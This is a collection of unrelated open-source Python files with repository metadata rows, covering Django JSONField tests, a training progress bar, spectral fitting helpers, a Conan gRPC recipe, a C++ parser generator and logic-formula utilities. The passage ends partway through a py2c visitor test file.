class TestFormField(PostgreSQLTestCase):
def test_valid(self):
field = forms.JSONField()
value = field.clean('{"a": "b"}')
self.assertEqual(value, {'a': 'b'})
def test_valid_empty(self):
field = forms.JSONField(required=False)
value = field.clean('')
self.assertIsNone(value)
def test_invalid(self):
field = forms.JSONField()
with self.assertRaises(exceptions.ValidationError) as cm:
field.clean('{some badly formed: json}')
self.assertEqual(cm.exception.messages[0], "'{some badly formed: json}' value must be valid JSON.")
def test_formfield(self):
model_field = JSONField()
form_field = model_field.formfield()
self.assertIsInstance(form_field, forms.JSONField)
def test_formfield_disabled(self):
class JsonForm(Form):
name = CharField()
jfield = forms.JSONField(disabled=True)
form = JsonForm({'name': 'xyz', 'jfield': '["bar"]'}, initial={'jfield': ['foo']})
self.assertIn('["foo"]</textarea>', form.as_p())
def test_prepare_value(self):
field = forms.JSONField()
self.assertEqual(field.prepare_value({'a': 'b'}), '{"a": "b"}')
self.assertEqual(field.prepare_value(None), 'null')
self.assertEqual(field.prepare_value('foo'), '"foo"')
def test_redisplay_wrong_input(self):
"""
When displaying a bound form (typically due to invalid input), the form
should not overquote JSONField inputs.
"""
class JsonForm(Form):
name = CharField(max_length=2)
jfield = forms.JSONField()
# JSONField input is fine, name is too long
form = JsonForm({'name': 'xyz', 'jfield': '["foo"]'})
self.assertIn('["foo"]</textarea>', form.as_p())
# This time, the JSONField input is wrong
form = JsonForm({'name': 'xy', 'jfield': '{"foo"}'})
# Appears once in the textarea and once in the error message
self.assertEqual(form.as_p().count(escape('{"foo"}')), 2)
def test_widget(self):
"""The default widget of a JSONField is a Textarea."""
field = forms.JSONField()
self.assertIsInstance(field.widget, widgets.Textarea)
def test_custom_widget_kwarg(self):
"""The widget can be overridden with a kwarg."""
field = forms.JSONField(widget=widgets.Input)
self.assertIsInstance(field.widget, widgets.Input)
def test_custom_widget_attribute(self):
"""The widget can be overridden with an attribute."""
class CustomJSONField(forms.JSONField):
widget = widgets.Input
field = CustomJSONField()
self.assertIsInstance(field.widget, widgets.Input)
def test_already_converted_value(self):
field = forms.JSONField(required=False)
tests = [
'["a", "b", "c"]', '{"a": 1, "b": 2}', '1', '1.5', '"foo"',
'true', 'false', 'null',
]
for json_string in tests:
val = field.clean(json_string)
self.assertEqual(field.clean(val), val)
def test_has_changed(self):
field = forms.JSONField()
self.assertIs(field.has_changed({'a': True}, '{"a": 1}'), True)
self.assertIs(field.has_changed({'a': 1, 'b': 2}, '{"b": 2, "a": 1}'), False)
| uranusjr/django | tests/postgres_tests/test_json.py | Python | bsd-3-clause | 13,888 | 0.001368 |
# -*- coding:utf8 -*-
# File : progress.py
# Author : Jiayuan Mao
# Email : maojiayuan@gmail.com
# Date : 2/26/17
#
# This file is part of TensorArtist.
from tartist.core.utils.thirdparty import get_tqdm_defaults
import tqdm
import numpy as np
def enable_epoch_progress(trainer):
pbar = None
def epoch_progress_on_iter_after(trainer, inp, out):
nonlocal pbar
if pbar is None:
pbar = tqdm.tqdm(total=trainer.epoch_size, leave=False, initial=trainer.iter % trainer.epoch_size,
**get_tqdm_defaults())
desc = 'Iter={}'.format(trainer.iter)
if 'error' in trainer.runtime:
desc += ', error={:.4f}'.format(trainer.runtime['error'])
for k in sorted(out.keys()):
v = out[k]
if isinstance(v, (str, int, float, np.ndarray, np.float32, np.float64, np.int32, np.int64)):
try:
v = float(v)
desc += ', {}={:.4f}'.format(k, v)
except ValueError:
pass
pbar.set_description(desc)
pbar.update()
def epoch_progress_on_epoch_after(trainer):
nonlocal pbar
pbar.close()
pbar = None
trainer.register_event('iter:after', epoch_progress_on_iter_after, priority=25)
trainer.register_event('epoch:after', epoch_progress_on_epoch_after, priority=5)
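# Usage sketch (assumes a trainer object following the TensorArtist trainer
# interface used above, i.e. exposing register_event and the runtime fields
# referenced in the callbacks):
#   enable_epoch_progress(trainer)
# Called once before training starts; the progress bar is then updated by the
# registered 'iter:after' and 'epoch:after' events.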
| vacancy/TensorArtist | tartist/plugins/trainer_enhancer/progress.py | Python | mit | 1,402 | 0.003566 |
from scipy.optimize import curve_fit
from numpy import log, isnan
class NotAModel(Exception):
pass
def chisq(self, result=None):
if result is None:
result = self.result
return ((self.data.cts(row=True)-result)**2/self.data.errors(row=True)**2).sum()
def cstat(self, result):
if result is None:
result = self.result
data = self.data.counts
result = result*self.data.exposure
C = result+data*(log(data)-log(result)-1)
return 2*C[~isnan(C)].sum()
def reduced_chisq(self):
return self.chisq(self.result)/(len(self.data.channels)-len(self.getThawed()))
def append(self, *args):
for model in args:
try:
model._calculate
model.freeze
model.thaw
model.calculate
model.setp
self.models.append(model)
except AttributeError:
raise self.NotAModel(model, model.__class__)
if len(self.models):
self.activate()
def delete(self, index):
# Prevent bad name access
self.models[index] = None
def activate(self, index=-1):
self.current = self.models[index]
self.currentindex = index
def nameModel(self, index, name):
setattr(self, name, lambda: self.activate(index))
def energies(self):
return self.resp.ebinAvg
def tofit(self, elist, *args):
res = self.current.tofit(elist, *args)
return self.resp.convolve_channels(res)
def toMinimize(self, args):
s = self.stat(self.tofit(self.energies(), *args))
return s
def fit(self):
model = self.current
args = self.initArgs()
bestfit, self.errs = curve_fit(self.tofit, self.energies(), self.data.cts(row=True), p0=args,
sigma=self.data.errors(row=True), absolute_sigma=True, epsfcn=self.eps)
self.stderr = dict(zip(model.getThawed(), [self.errs[j][j]**0.5 for j in range(len(self.errs))]))
# ftol = 2.220446049250313e-09
# bestfit = minimize(self.toMinimize,args,method="L-BFGS-B",options={'ftol':ftol})
# if not bestfit.success:
# raise ValueError("-E- Failed fit with: "+bestfit.message.decode('unicode-escape'))
# self.stderr = dict(zip(model.getThawed(),sqrt(abs(max(1,bestfit.fun)*ftol*diag(bestfit.hess_inv.todense())))))
# self.calc(dict(zip(model.getThawed(),bestfit.x)))
self.calc(dict(zip(model.getThawed(), bestfit)))
| uperetz/AstroTools | fitter/_modeling.py | Python | apache-2.0 | 2,367 | 0.00338 |
#!/usr/bin/env python
import sys, argparse
def main():
parser = argparse.ArgumentParser()
parser.add_argument('-i', '--input', type=str, action='store', dest='input', default=None, help="Input file")
args = parser.parse_args()
stats = dict()
    if args.input is None:
        print "Error: No input file"
        sys.exit(1)
with open(args.input) as in_file:
for line in in_file.readlines():
time = int(line.split()[0])
tx_bytes = int(line.split()[1])
stats[time] = tx_bytes
stats = sorted(stats.items())
start_time = stats[0][0]
prev_tx = stats[0][1]
no_traffic_flag = True
for time, tx_bytes in stats:
if no_traffic_flag:
if tx_bytes > (prev_tx+100000):
no_traffic_flag = False
start_time, prev_tx = time, tx_bytes
else:
print (time-start_time), (tx_bytes-prev_tx)
prev_tx = tx_bytes
if __name__ == "__main__":
main()
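# Usage sketch (the input file name is hypothetical):
#   ./sort.py -i tx_bytes_samples.txt
# Each input line is expected to be "<time> <tx_bytes>"; output starts once
# tx_bytes exceeds its initial value by more than 100000 (traffic detected).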
| merlin-lang/kulfi | experiments/testbed/results/plot/sort.py | Python | lgpl-3.0 | 989 | 0.005056 |
"""return a jumbled version of a string. eg, the lazy hamster is jumping becomes the lzay hmasetr si jmunipg
shuffles insides of words.
"""
import random
import string
#okay, so this will be the jumble algorithm
#variables, passed
#string_to_jumble = "" #yeah
#jumble_mode = true # do u switch words of two letters
def string_jumble(string_to_jumble, jumble_mode = True):
    #variables, internal
    string_to_return = "" #New string
    string_words = [""] #array containing the words of the string
    current_word = [] #array containing the letters of the current word
    punctuation_ = [] #array containing the separator that follows each word
    i = 0
    #put the words in an array
    for char in string_to_jumble:
        #each non-letter character ends the current word and is kept as punctuation
        if char not in string.ascii_letters:
            punctuation_.append(char)
            i += 1
            #make sure there's something to put the next word in!
            string_words.append("")
        else:
            #otherwise add to the current word
            string_words[i] += char
    #put the letters of each word into an array, shuffle them, then rebuild the string
    for index, word in enumerate(string_words):
        #the separator that followed this word, if any (the last word has none)
        separator = punctuation_[index] if index < len(punctuation_) else ""
        #short words (three letters or fewer) are shuffled whole, but only in jumble mode
        if len(word) <= 3:
            if jumble_mode:
                current_word = list(word)
                random.shuffle(current_word)
                string_to_return += "".join(current_word)
            else:
                string_to_return += word
            string_to_return += separator
            #that's all for this word
            continue
        #ok now for the REAL real deal:
        #keep the first and last letters in place and shuffle everything in between
        current_word = list(word[1:-1])
        random.shuffle(current_word)
        string_to_return += word[0] + "".join(current_word) + word[-1]
        string_to_return += separator
        #next word!
    return string_to_return
#string_jumble("a0boop1boop3boop4boop5hey")
string_jumble("I1think2my3dog4is5terribly6lazy;7I8-9I!mean,£he$-%is^really&quite*fat.")#looks like list.index won't work for us
#string_jumble("")#fix this too
| Moth-Tolias/LetterBoy | backend/jumbles nontrobo/jumbles nontrobo.py | Python | gpl-3.0 | 4,226 | 0.018462 |
alist = ['Micheal', 'Franklin', 'Trevor']
for i in alist:
print "Happy birthday, " + i
| BedrockDev/Sunrin2017 | Software/Web Programming/Project07/exam_03.py | Python | mit | 91 | 0 |
from conans import ConanFile, CMake, tools
from conans.errors import ConanInvalidConfiguration
import os
import shutil
import time
import platform
class grpcConan(ConanFile):
name = "grpc"
version = "1.27.3"
description = "Google's RPC library and framework."
topics = ("conan", "grpc", "rpc")
url = "https://github.com/inexorgame/conan-grpc"
homepage = "https://github.com/grpc/grpc"
license = "Apache-2.0"
exports_sources = ["CMakeLists.txt", "gRPCTargets-helpers.cmake"]
generators = "cmake"
short_paths = True # Otherwise some folders go out of the 260 chars path length scope rapidly (on windows)
settings = "os", "arch", "compiler", "build_type"
options = {
"fPIC": [True, False],
}
default_options = {
"fPIC": True,
}
_source_subfolder = "source_subfolder"
_build_subfolder = "build_subfolder"
requires = (
"abseil/20211102.0",
"zlib/1.2.11",
"openssl/1.1.1k",
"protobuf/3.9.1@bincrafters/stable",
"c-ares/1.15.0"
)
def build_requirements(self):
self.build_requires("protoc_installer/3.9.1@bincrafters/stable")
if self.user and self.channel:
self.build_requires("grpc_codegen/{}@{}/{}".format(self.version, self.user, self.channel))
else:
self.build_requires("grpc_codegen/{}".format(self.version))
def configure(self):
if self.settings.os == "Windows" and self.settings.compiler == "Visual Studio":
del self.options.fPIC
compiler_version = int(str(self.settings.compiler.version))
if compiler_version < 14:
raise ConanInvalidConfiguration("gRPC can only be built with Visual Studio 2015 or higher.")
def source(self):
tools.get(**self.conan_data["sources"][self.version])
extracted_dir = "grpc-" + self.version
if platform.system() == "Windows":
time.sleep(8) # Work-around, see https://github.com/conan-io/conan/issues/5205
os.rename(extracted_dir, self._source_subfolder)
cmake_path = os.path.join(self._source_subfolder, "CMakeLists.txt")
tools.replace_in_file(cmake_path, "absl::strings", "CONAN_PKG::abseil")
tools.replace_in_file(cmake_path, "absl::optional", "CONAN_PKG::abseil")
tools.replace_in_file(cmake_path, "absl::inlined_vector", "CONAN_PKG::abseil")
tools.replace_in_file(cmake_path, "set(_gRPC_CPP_PLUGIN $<TARGET_FILE:grpc_cpp_plugin>)", "find_program(_gRPC_CPP_PLUGIN grpc_cpp_plugin)")
tools.replace_in_file(cmake_path, "DEPENDS ${ABS_FIL} ${_gRPC_PROTOBUF_PROTOC} grpc_cpp_plugin", "DEPENDS ${ABS_FIL} ${_gRPC_PROTOBUF_PROTOC} ${_gRPC_CPP_PLUGIN}")
_cmake = None
def _configure_cmake(self):
if self._cmake:
return self._cmake
cmake = CMake(self)
cmake.definitions['gRPC_BUILD_CODEGEN'] = "ON"
cmake.definitions['gRPC_BUILD_CSHARP_EXT'] = "OFF"
cmake.definitions['gRPC_BUILD_TESTS'] = "OFF"
cmake.definitions['gRPC_INSTALL'] = "ON"
cmake.definitions["gRPC_BUILD_GRPC_CPP_PLUGIN"] = "OFF"
cmake.definitions["gRPC_BUILD_GRPC_CSHARP_PLUGIN"] = "OFF"
cmake.definitions["gRPC_BUILD_GRPC_OBJECTIVE_C_PLUGIN"] = "OFF"
cmake.definitions["gRPC_BUILD_GRPC_PHP_PLUGIN"] = "OFF"
cmake.definitions["gRPC_BUILD_GRPC_PYTHON_PLUGIN"] = "OFF"
cmake.definitions["gRPC_BUILD_GRPC_RUBY_PLUGIN"] = "OFF"
cmake.definitions["gRPC_BUILD_GRPC_NODE_PLUGIN"] = "OFF"
# tell grpc to use the find_package versions
cmake.definitions['gRPC_CARES_PROVIDER'] = "package"
cmake.definitions['gRPC_ZLIB_PROVIDER'] = "package"
cmake.definitions['gRPC_SSL_PROVIDER'] = "package"
cmake.definitions['gRPC_PROTOBUF_PROVIDER'] = "none"
cmake.definitions['gRPC_ABSL_PROVIDER'] = "none"
# Workaround for https://github.com/grpc/grpc/issues/11068
cmake.definitions['gRPC_GFLAGS_PROVIDER'] = "none"
cmake.definitions['gRPC_BENCHMARK_PROVIDER'] = "none"
        # Compilation with MinGW GCC requires _WIN32_WINNT to be set to at least 0x600
# https://github.com/grpc/grpc/blob/109c570727c3089fef655edcdd0dd02cc5958010/include/grpc/impl/codegen/port_platform.h#L44
if self.settings.os == "Windows" and self.settings.compiler == "gcc":
cmake.definitions["CMAKE_CXX_FLAGS"] = "-D_WIN32_WINNT=0x600"
cmake.definitions["CMAKE_C_FLAGS"] = "-D_WIN32_WINNT=0x600"
cmake.configure(build_folder=self._build_subfolder)
self._cmake = cmake
return cmake
def build(self):
cmake = self._configure_cmake()
cmake.build()
def package(self):
cmake = self._configure_cmake()
cmake.install()
shutil.rmtree(os.path.join(self.package_folder, "lib", "pkgconfig"))
shutil.rmtree(os.path.join(self.package_folder, "lib", "cmake", "grpc", "modules"))
self.copy("gRPCTargets-helpers.cmake", dst=os.path.join("lib", "cmake", "grpc"))
self.copy("LICENSE*", src=self._source_subfolder, dst="licenses")
def package_info(self):
self.cpp_info.libs = [
"grpc++_unsecure",
"grpc++_reflection",
"grpc++_error_details",
"grpc++",
"grpc_unsecure",
"grpc_plugin_support",
"grpc_cronet",
"grpcpp_channelz",
"grpc",
"gpr",
"address_sorting",
"upb",
]
if self.settings.compiler == "Visual Studio":
self.cpp_info.system_libs += ["wsock32", "ws2_32"]
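# Usage sketch (the user/channel below is hypothetical): the recipe can be built
# and packaged locally with
#   conan create . somebody/testing
# after which consumers can require "grpc/1.27.3@somebody/testing".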
| google/orbit | third_party/conan/recipes/grpc/conanfile.py | Python | bsd-2-clause | 5,670 | 0.002822 |
#!/usr/bin/python3
import argparse
import collections
import json
import string
import sys
header_template = """
#ifndef ASPARSERATIONS_GENERATED_${class_name}_H_
#define ASPARSERATIONS_GENERATED_${class_name}_H_
#include <array>
#include <map>
#include <memory>
#include <set>
#include <utility>
#include <vector>
$header_front
$begin_namespace
enum class Token
{
$tokens
};
enum class Nonterminal
{
$nonterminals
};
enum class Production
{
$productions
};
struct Lexer_State
{
const char* begin;
const char* end;
unsigned int lines;
const char* last_newline;
};
Lexer_State next(const Lexer_State&);
/**
*/
class Node
{
public:
Node(const $payload&, const Lexer_State&);
Node(const $payload&, std::vector<std::unique_ptr<Node>>);
const $payload& payload() const;
const std::vector<std::unique_ptr<Node>>& children() const;
const Lexer_State& state() const;
virtual ~Node() = default;
private:
$payload m_payload;
std::vector<std::unique_ptr<Node>> m_children;
Lexer_State m_state;
};
class $class_name
{
public:
$class_name();
std::unique_ptr<Node> parse(const std::string&, $lexer&, $callback&);
static std::string nonterminal_to_string(Nonterminal);
static std::string production_to_string(Production);
virtual ~$class_name() = default;
private:
struct Mangled_Production
{
const Nonterminal nonterminal;
const Production production;
unsigned int child_count;
};
struct Productions
{
Productions();
$mangled_productions_header
};
struct State
{
std::map<Token,std::pair<const State*,std::set<const Mangled_Production*>>>
actions;
std::map<Nonterminal,const State*> gotos;
};
std::vector<State> m_states;
std::vector<std::pair<std::unique_ptr<Node>,const State*>> m_stack;
std::unique_ptr<Productions> m_productions;
void m_process(const State&, const Lexer_State&, $lexer&, $callback&, std::unique_ptr<Node>&);
void m_reduce(const Mangled_Production&, $callback&, std::unique_ptr<Node>&);
};
$end_namespace
#endif
"""
src_template = """
#include <algorithm>
#include <stdexcept>
#include <utility>
#include "../include/$class_name.hpp"
$src_front
$namespace::Lexer_State $namespace::next(const $namespace::Lexer_State& ls)
{
$namespace::Lexer_State ls_prime = {
ls.end,
ls.end,
ls.lines,
ls.last_newline
};
return ls_prime;
}
$namespace::Node::Node(const $payload& payload,
const $namespace::Lexer_State& state)
: m_payload(payload), m_state(state) {}
$namespace::Node::Node(const $payload& payload,
std::vector<std::unique_ptr<Node>> children)
{
if(children.empty())
throw std::runtime_error("Zero children,"
"call Node(const char*, const char*) instead");
m_payload = payload;
m_children = std::move(children);
m_state = $namespace::Lexer_State {
m_children.front()->state().begin,
m_children.back()->state().end,
m_children.back()->state().lines,
m_children.back()->state().last_newline
};
}
const $payload& $namespace::Node::payload() const
{
return m_payload;
}
const std::vector<std::unique_ptr<$namespace::Node>>&
$namespace::Node::children() const
{
return m_children;
}
const $namespace::Lexer_State& $namespace::Node::state() const
{
return m_state;
}
$namespace::$class_name::Productions::Productions()
: $mangled_productions_src
{
}
$namespace::$class_name::$class_name()
: m_productions(new Productions()), m_states($state_count)
{
$states
}
std::unique_ptr<$namespace::Node>
$namespace::$class_name::parse(const std::string& input,
$lexer& lexer,
$callback& callback)
{
std::unique_ptr<Node> root;
m_process(m_states.front(),
$namespace::Lexer_State{input.data(), input.data(),
1, input.data() - 1},
lexer, callback, root);
while(!m_stack.empty()) {
m_process(*m_stack.back().second,
$namespace::next(m_stack.back().first->state()),
lexer, callback, root);
}
return root;
}
std::string
$namespace::$class_name::nonterminal_to_string($namespace::Nonterminal nt)
{
switch(nt) {
$nonterminals_to_strings
}
throw std::runtime_error("Unknown nonterminal");
}
std::string
$namespace::$class_name::production_to_string($namespace::Production p)
{
switch(p) {
$productions_to_strings
}
throw std::runtime_error("Unknown production");
}
void $namespace::$class_name::m_process(
const $namespace::$class_name::State& state,
const $namespace::Lexer_State& lex_state,
$lexer& lexer,
$callback& callback,
std::unique_ptr<$namespace::Node>& root)
{
$namespace::Lexer_State err;
for(auto& action : state.actions) {
auto result = lexer.expect(action.first, lex_state);
err = result.first;
if(result.second) {
if(action.second.first != nullptr) {
try {
m_stack.emplace_back(
std::unique_ptr<$namespace::Node>(new Node(callback.call(action.first,
std::string(result.first.begin,
result.first.end)),
result.first)),
action.second.first
);
} catch(std::runtime_error& e) {
throw std::runtime_error(std::to_string(err.lines) + ":"
+ std::to_string(err.end - 1 - err.last_newline) + ": " + e.what());
}
return;
}
if(!action.second.second.empty()) {
m_reduce(**action.second.second.begin(), callback, root);
return;
}
}
}
throw std::runtime_error("Failed parse: " + std::to_string(err.lines)
+ ":" + std::to_string(err.end - err.last_newline));
}
void $namespace::$class_name::m_reduce(
const $namespace::$class_name::Mangled_Production& production,
$callback& callback,
std::unique_ptr<$namespace::Node>& root)
{
if(m_stack.empty()) throw std::runtime_error("Can't reduce empty stack");
std::unique_ptr<$namespace::Node> node = nullptr;
if(production.child_count == 0) {
node = std::unique_ptr<$namespace::Node>(new Node(callback.call(production.nonterminal,
production.production,
{}),
$namespace::next(m_stack.back().first->state())));
} else {
std::vector<std::unique_ptr<Node>> popped;
for(int i = 0; i < production.child_count; ++i) {
if(m_stack.empty()) throw std::runtime_error("Stack underflow");
popped.push_back(std::move(m_stack.back().first));
m_stack.pop_back();
}
std::reverse(popped.begin(), popped.end());
try {
auto temp = callback.call(production.nonterminal, production.production, popped);
node = std::unique_ptr<$namespace::Node>(new Node(temp, std::move(popped)));
} catch(std::runtime_error& e) {
throw std::runtime_error(std::string("Error: ") + e.what());
}
}
if(production.nonterminal == Nonterminal::accept_) {
root = std::move(node);
return;
}
const State* state;
if(m_stack.empty()) {
state = &m_states[0];
} else {
state = m_stack.back().second;
}
auto iter = state->gotos.find(production.nonterminal);
if(iter == m_stack.back().second->gotos.end()) {
throw std::runtime_error("Unknown nonterminal");
}
m_stack.emplace_back(std::move(node), iter->second);
}
"""
def gen_namespace_decls(namespaces):
begin = ""
end = ""
for namespace in namespaces:
begin += "namespace " + namespace + " {\n"
end = "} // " + namespace + "\n" + end
return {"begin_namespace" : begin, "end_namespace" : end}
def gen_production_list(grammar):
names = set()
for name,productions in grammar["nonterminals"].items():
for prodname,wildcard in productions.items():
names.add(prodname)
lines = ",\n ".join(names)
return lines
def gen_mangled_production_list_header(grammar):
lines = ""
for name,productions in grammar["nonterminals"].items():
for prodname,symbols in productions.items():
lines += "Mangled_Production " + name + "_" + prodname + ";\n "
return lines
def gen_header(template, table, config):
tokens = ",\n ".join(table["grammar"]["tokens"])
nonterminal_list = []
for name, wildcard in table["grammar"]["nonterminals"].items():
nonterminal_list.append(name)
nonterminals = ",\n ".join(nonterminal_list)
mangled_productions = gen_mangled_production_list_header(table["grammar"])
productions = gen_production_list(table["grammar"])
# Lost in stupid parentheses
return string.Template( \
string.Template( \
string.Template(template) \
.safe_substitute(config)) \
.safe_substitute(tokens=tokens, nonterminals=nonterminals, \
mangled_productions_header=mangled_productions, \
productions=productions,
state_count=str(len(table["table"])))) \
.substitute(gen_namespace_decls(config["namespace"]))
def gen_namespace_prefix(namespaces):
return "::".join(namespaces)
def gen_mangled_productions_src(grammar):
lines = []
for name,productions in grammar["nonterminals"].items():
for prodname,symbols in productions.items():
lines.append(name + "_" + prodname + " {Nonterminal::"\
+ name + ", " + "Production::" + prodname + ", " \
+ str(len(symbols)) + "}")
return ",\n ".join(lines)
def gen_state(template, state, config):
actions = []
gotos = []
for token, action in state["actions"].items():
action_str = "{\n Token::" + token + ", {"
if action["shift"] is None:
action_str += "nullptr, {\n "
else:
action_str += "&m_states["+str(action["shift"])+"], {\n "
reduce_strs = map(lambda x :
"&m_productions->" + x["nonterminal"]
+ "_" + x["production"],\
action["reductions"])
reduce_str = ",\n ".join(reduce_strs)
action_str += reduce_str + "\n }}\n }"
actions.append(action_str)
for nonterminal, index in state["gotos"].items():
goto_str = "{Nonterminal::" + nonterminal \
+ ", &m_states[" + str(index) + "]}"
gotos.append(goto_str)
actions_str = ",\n ".join(actions)
gotos_str = ",\n ".join(gotos)
return "m_states[" + str(state["index"]) \
+ "] = State {\n { // actions\n " + actions_str + "\n }" \
+ ",\n { // gotos \n " + gotos_str + "\n }\n };"
def gen_nonterminal_to_strings(nonterminal):
name, wildcard = nonterminal
return "case Nonterminal::" + name + ": return \"" + name + "\";"
def gen_productions_to_strings(grammar):
names = set()
for name,productions in grammar["nonterminals"].items():
for prodname,wildcard in productions.items():
names.add(prodname)
lines = map(lambda p: "case Production::" + p + ": return \"" + p \
+ "\";",
names)
return "\n ".join(lines)
def gen_src(template, table, config):
namespace_prefix = gen_namespace_prefix(config["namespace"])
states = map(lambda x : gen_state(template, x, config), table["table"])
states_text = "\n ".join(states)
nonterminals_to_strings = "\n ".join(map(gen_nonterminal_to_strings,\
table["grammar"]["nonterminals"]\
.items()))
return string.Template(string.Template(template) \
.safe_substitute(namespace=namespace_prefix, states=states_text, \
state_count=len(table["table"]),\
nonterminals_to_strings=nonterminals_to_strings,\
productions_to_strings\
=gen_productions_to_strings(table["grammar"]),\
mangled_productions_src=\
gen_mangled_productions_src(table["grammar"]))) \
.safe_substitute(config)
def main():
argparser = argparse.ArgumentParser()
argparser.add_argument("json")
argparser.add_argument("config")
argparser.add_argument("dest")
args = argparser.parse_args()
table = json.load(open(args.json, "r"),\
object_pairs_hook=collections.OrderedDict)
config = json.load(open(args.config, "r"))
dest = args.dest
header_file = open(dest + "/include/" + config["class_name"] + ".hpp", "w+")
src_file = open(dest + "/src/" + config["class_name"] + ".cpp", "w+")
header_file.write(gen_header(header_template, table, config))
src_file.write(gen_src(src_template, table, config))
header_file.close()
src_file.close()
if __name__ == '__main__':
main()
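# A sketch of the config JSON this script expects (all values hypothetical),
# inferred from the keys and template placeholders used above ($class_name,
# $namespace, $lexer, $callback, $payload, $header_front, $src_front):
#   {
#     "class_name": "My_Parser",
#     "namespace": ["myproject", "generated"],
#     "lexer": "myproject::Lexer",
#     "callback": "myproject::Callback",
#     "payload": "myproject::Payload",
#     "header_front": "#include \"payload.hpp\"",
#     "src_front": "#include \"lexer.hpp\""
#   }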
| TheAspiringHacker/Asparserations | bootstrap/parser_gen.py | Python | mit | 13,102 | 0.004427 |
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# See license.txt
import frappe
import unittest
test_records = frappe.get_test_records('Note')
class TestNote(unittest.TestCase):
pass
| indictranstech/omnitech-frappe | frappe/desk/doctype/note/test_note.py | Python | mit | 225 | 0.013333 |
# Copyright (C) 2013 Korei Klein <korei.klein1@gmail.com>
from calculus.enriched import formula, constructors, endofunctor
from calculus.basic import formula as basicFormula
from lib.common_symbols import leftSymbol, rightSymbol, relationSymbol, domainSymbol, inputSymbol, outputSymbol, functionPairsSymbol
from lib import common_vars
from calculus import variable
def IsEquivalence(e):
return constructors.Always(constructors.Holds(e, common_vars.equivalence))
def Maps(a, b, f):
return constructors.Always(constructors.Holds(
variable.ProductVariable([ (inputSymbol, a)
, (outputSymbol, b)]),
variable.ApplySymbolVariable(f, functionPairsSymbol)))
def IsFunction(f):
return constructors.Always(constructors.Holds(f, common_vars.function))
InDomain = formula.InDomain
Equal = formula.Equal
Identical = formula.Identical
def InductionBase(var, claim):
return claim.substituteVariable(var, common_vars.zero)
def InductionStep(var, claim):
newVar = var.relatedVariable()
return constructors.Forall([constructors.BoundedVariableBinding(newVar, common_vars.natural)],
constructors.Implies([claim.substituteVariable(var, newVar)],
claim.updateVariables().substituteVariable(var, variable.ApplySymbolVariable(newVar, common_vars.S))))
def InductionHypotheses(var, claim):
return constructors.And([InductionBase(var, claim), InductionStep(var, claim)])
def InductionConclusion(var, claim):
newVar = var.relatedVariable()
return constructors.Forall([constructors.BoundedVariableBinding(newVar, common_vars.natural)],
claim.substituteVariable(var, newVar))
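# Induction encodes the usual induction principle on the naturals:
#   (claim[var := 0] and (forall n : natural. claim[var := n] -> claim[var := S(n)]))
#   -> forall n : natural. claim[var := n]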
def Induction(var, claim):
return constructors.Implies([InductionBase(var, claim), InductionStep(var, claim)],
InductionConclusion(var, claim))
def _forwardImportInduction(x, var, claim):
hypotheses = InductionHypotheses(var, claim)
conclusion = InductionConclusion(var, claim)
return constructors.assume(x, hypotheses).forwardFollow(lambda x:
formula.Arrow(src = x,
tgt = constructors.Not(
constructors.And([hypotheses, constructors.Not(constructors.And([conclusion, x]))])),
basicArrow = x.translate().forwardOnNotFollow(lambda x:
x.backwardOnRightFollow(lambda x:
x.backwardOnNotFollow(lambda x:
x.forwardOnLeftFollow(lambda x:
basicFormula.Induction(src = x, tgt = conclusion.translate())))))))
def forwardImportInductionAndContradict(x, var, claim):
assert(x.__class__ == formula.Exists)
hypotheses = InductionHypotheses(var, claim)
conclusion = InductionConclusion(var, claim)
return constructors.assume(x.updateVariables(), hypotheses).forwardFollow(lambda x:
formula.Arrow(src = x.updateVariables(), tgt = constructors.Not(hypotheses),
basicArrow = x.translate().forwardOnNotFollow(lambda x:
x.backwardOnRightFollow(lambda x:
x.backwardOnNotFollow(lambda x:
x.forwardOnLeftFollow(lambda x:
basicFormula.Induction(src = x, tgt = conclusion.translate())).forwardFollow(lambda x:
x.forwardCommute().forwardFollow(lambda x:
x.forwardOnLeftFollow(lambda x:
x.forwardOnBodyFollow(lambda x:
x.forwardOnRightFollow(lambda x:
x.forwardDoubleDual())))).forwardFollow(lambda x:
x.forwardContradict())))).backwardFollow(lambda x:
x.backwardOnRightFollow(lambda x:
basicFormula.trueIsNotFalse).backwardFollow(lambda x:
x.backwardIntroUnitLeft())))))
def forwardInductionOnIExists(x, i):
var = x.bindings[i].variable
claim = constructors.Not(x.value)
a = x.forwardPushAndSplit(i)
a = a.forwardFollow(lambda x:
endofunctor.Exists(x.bindings).onArrow(forwardImportInductionAndContradict(x.value, var, claim)))
return a
| koreiklein/fantasia | lib/common_formulas.py | Python | gpl-2.0 | 3,977 | 0.023887 |
# Copyright 2019 The Magenta Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Imports objects into the top-level common namespace."""
from __future__ import absolute_import
from .beam_search import beam_search
from .nade import Nade
from .sequence_example_lib import count_records
from .sequence_example_lib import flatten_maybe_padded_sequences
from .sequence_example_lib import get_padded_batch
from .sequence_example_lib import make_sequence_example
from .tf_utils import merge_hparams
| jesseengel/magenta | magenta/common/__init__.py | Python | apache-2.0 | 1,001 | 0 |
"""Unit-tests for `tree.visitors`
"""
from py2c import tree
from py2c.tree import visitors
from py2c.tests import Test, data_driven_test
from nose.tools import assert_equal
# TEST:: Add non-node fields
# =============================================================================
# Helper classes
# =============================================================================
class BasicNode(tree.Node):
_fields = []
class BasicNodeReplacement(tree.Node):
_fields = []
class BasicNodeWithListReplacement(tree.Node):
_fields = []
class BasicNodeDeletable(tree.Node):
_fields = []
class ParentNode(tree.Node):
_fields = [
('child', tree.Node, 'OPTIONAL'),
]
class ParentNodeWithChildrenList(tree.Node):
"""Node with list of nodes as field
"""
_fields = [
('child', tree.Node, 'ZERO_OR_MORE'),
]
# -----------------------------------------------------------------------------
# Concrete Visitors used for testing
# -----------------------------------------------------------------------------
class VisitOrderCheckingVisitor(visitors.RecursiveNodeVisitor):
def __init__(self):
super().__init__()
self.visited = []
def generic_visit(self, node):
self.visited.append(node.__class__.__name__)
super().generic_visit(node)
def visit_BasicNodeReplacement(self, node):
self.visited.append("visited Copy!")
class AccessPathCheckingVisitor(visitors.RecursiveNodeVisitor):
def __init__(self):
super().__init__()
self.recorded_access_path = None
def visit_BasicNode(self, node):
